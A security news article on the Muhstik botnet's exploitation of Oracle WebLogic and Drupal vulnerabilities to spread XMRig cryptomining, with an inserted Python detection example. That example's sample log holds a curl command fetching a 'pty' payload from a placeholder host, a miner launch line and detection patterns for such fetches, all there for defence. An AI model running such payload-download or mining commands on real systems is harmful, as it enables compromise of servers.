Muhstik Botnet Targets Flaws in Oracle WebLogic, Drupal
Researchers: Malware Leverages Vulnerabilities to Mine Cryptocurrency
The Muhstik botnet, which has been operating for at least two years, has recently started targeting vulnerabilities in the Oracle WebLogic application server and the Drupal content management system as a way to expand its cryptocurrency mining capabilities, according to security firm Lacework.
Earlier, researchers had found that Muhstik targeted vulnerable IoT devices, such as routers, to grow its malicious network and perform other tasks, such as mining for cryptocurrency or launching distributed denial-of-service attacks.
Now, the operators behind Muhstik are targeting vulnerabilities in web applications to increase the botnet's reach. This includes two vulnerabilities in Oracle WebLogic, which is used to help build and deploy enterprise Java EE applications. Those flaws are tracked as CVE-2019-2725 and CVE-2017-10271. Also targeted is a remote code execution vulnerability in Drupal tracked as CVE-2018-7600.
One of the Oracle WebLogic vulnerabilities, CVE-2019-2725, was disclosed over a year ago, when researchers from Palo Alto Networks Unit 42 warned that it could be used to mine for cryptocurrency or deploy ransomware.
The Lacework researchers note that Muhstik continues to use the IRC protocol to communicate with its command-and-control server, which is fairly common for botnets (see: The Hacker Battle for Home Routers).
After exploiting vulnerabilities in either connected devices or web applications, the botnet first downloads a payload called "pty" and then tries to establish a connection with the command-and-control server over the IRC protocol, according to the Lacework report.
Muhstik then attempts to download other malicious code to the infected device or web application. This includes the XMRig miner, which is increasingly used to mine cryptocurrency such as monero (see: Kubeflow Targeted in XMRig Monero Cryptomining Campaign).
The botnet also attempts to download a scanning module that searches for other vulnerable applications or connected devices and then attempts to connect those to its malicious infrastructure, according to the report.
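The infection chain described above (payload download, outbound IRC connection to the C2 server, then a miner and a scanner) is a sequence a defender can look for on a web application host. The script below is an added example, not code from the Lacework report or from Muhstik; it runs a small correlation over constructed process and network log lines in a simplified format of its own, and assumes the C2 uses the standard IRC ports (6667 and 6697) and that the miner is recognisable by common XMRig command-line traits such as a `stratum+tcp://` pool URL. The IP addresses in the sample lines are documentation-range placeholders.

```python
"""Added detection example: correlate the Muhstik-style stages the article
describes (payload download -> outbound IRC -> miner launch) per host.
The log format and every sample line here are constructed for this example."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Assumption: the IRC C2 channel uses the default IRC ports.
IRC_PORTS = {6667, 6697}

# Download stage: a fetch tool pulling the "pty" payload or the ".x_3sh"
# downloader named in the report (file names taken from the article).
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b.*(\bpty\b|\.x_3sh\b)")

# Miner stage: traits typical of an XMRig command line (assumption: the
# dropped miner keeps its usual name or pool/donate options).
MINER_PATTERNS = [re.compile(p) for p in (r"stratum\+tcp://", r"\bxmrig\b", r"--donate-level")]


@dataclass
class Event:
    host: str
    kind: str    # "proc" (a process launch) or "net" (an outbound connection)
    detail: str  # command line for "proc", "dst_ip:dst_port" for "net"


def parse_line(line: str) -> Event:
    """Parse the constructed format '<host> <proc|net> <detail...>'."""
    host, kind, detail = line.split(" ", 2)
    return Event(host, kind, detail)


def detect(lines: List[str]) -> Dict[str, List[str]]:
    """Return host -> ordered list of stages seen, only for hosts where an
    outbound IRC connection followed a payload download (the order the
    report describes). A lone IRC connection is not enough to flag a host."""
    stages: Dict[str, List[str]] = {}
    for line in lines:
        ev = parse_line(line)
        seen = stages.setdefault(ev.host, [])
        if ev.kind == "proc" and DOWNLOAD_RE.search(ev.detail):
            seen.append("download")
        elif ev.kind == "net":
            _dst, port = ev.detail.rsplit(":", 1)
            if int(port) in IRC_PORTS and "download" in seen:
                seen.append("irc_c2")
        elif ev.kind == "proc" and any(p.search(ev.detail) for p in MINER_PATTERNS):
            seen.append("miner")
    return {host: s for host, s in stages.items() if "irc_c2" in s}


# Constructed sample log: web01 shows the full chain, db01 is benign,
# web02 opens an IRC connection without a prior download (not flagged).
SAMPLE_LOG = [
    "web01 proc /usr/sbin/httpd -DFOREGROUND",
    "web01 proc curl -fsSL http://198.51.100.7/pty -o /tmp/pty",
    "web01 net 198.51.100.7:6667",
    "web01 proc /tmp/xmrig -o stratum+tcp://198.51.100.7:3333 --donate-level 1",
    "db01 net 203.0.113.5:443",
    "web02 net 198.51.100.9:6667",
]

if __name__ == "__main__":
    for host, stages in detect(SAMPLE_LOG).items():
        print(f"{host}: {' -> '.join(stages)}")
```

Requiring the download stage before counting an IRC connection keeps a single misclassified port from raising an alert on its own; in practice the "pty" and ".x_3sh" names are the weakest part of the rule, since an operator can rename a payload at no cost, whereas an application server that suddenly speaks IRC outbound is worth investigating regardless of file names.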
"Usually, Muhstik will be instructed to download an XMRig miner and a scanning module. The scanning module is used for growing the botnet through targeting other Linux servers and home routers," Chris Hall, a cloud security researcher at Lacework, notes in the report.
The researchers also found the Muhstik botnet leverages source code from the Mirai botnet. This includes a memory scraper, which can kill other malware within a device (see: Even in Test Mode, New Mirai Variant Infecting IoT Devices).
The Lacework researchers found hints that the botnet might have its origins in China.
All of Muhstik's original malware variants had been uploaded to VirusTotal before the first attacks were spotted in the wild in 2018, according to the report. Those malware variant strings contain the word "shenzhouwangyun," which appears to be a reference to a Chinese forensics firm called Shen Zhou Wang Yun Information Technology Co. Ltd., according to the report.
Other security researchers have noted that this company is suspected of developing other types of malware such as HiddenWasp, a Linux-based Trojan.
"Also, the original specimens were only uploaded one time, suggesting Shen Zhou Wang Yun is likely the malware originator and not simply the first uploader," Hall notes in the report. "One of the uploads (.x_3sh) had zero detections and appears to be the first Muhstik downloader."